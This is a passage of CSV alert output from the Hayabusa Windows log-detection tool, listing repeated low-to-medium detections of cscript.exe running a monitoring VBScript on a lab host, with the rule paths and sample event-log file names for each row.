""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:05:03.001 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:05:03.001 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13e0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:05:03.001 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:05:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:05:03.018 
+00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:06:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:06:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:06:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1460 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:06:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:06:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:06:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:07:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:07:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:07:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: 
C:\Windows\System32\cscript.exe | PID: 0x958 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:07:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:07:03.020 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:07:03.020 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:08:03.001 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:08:03.001 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:08:03.001 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:08:03.001 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:08:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:08:03.018 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:09:03.005 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: 
C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:09:03.005 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:09:03.005 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x164 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:09:03.005 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:09:03.019 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:09:03.019 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:10:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:10:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:10:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xd54 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:10:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 
+2021-04-21 15:10:03.037 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:10:03.037 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:11:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:11:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:11:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1268 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:11:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:11:03.032 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:11:03.032 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:12:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:12:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:12:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1380 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:12:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:12:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:12:03.027 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:13:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: 
C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:13:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:13:03.010 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:13:03.010 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:13:03.024 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:13:03.024 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:14:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:14:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:14:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:14:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 
+2021-04-21 15:14:03.023 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:14:03.023 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:15:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:15:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:15:03.006 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:15:03.006 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:15:03.021 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:15:03.021 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:16:03.002 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 